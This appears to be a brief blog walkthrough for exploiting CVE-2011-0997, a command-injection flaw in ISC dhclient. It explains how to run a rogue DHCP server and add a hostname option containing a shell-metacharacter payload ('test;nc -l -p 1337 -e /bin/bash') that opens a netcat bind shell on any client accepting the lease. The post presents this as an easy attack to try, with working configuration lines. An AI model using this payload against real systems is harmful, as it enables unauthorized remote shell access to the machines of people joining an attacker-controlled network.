Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997
This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine π
What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.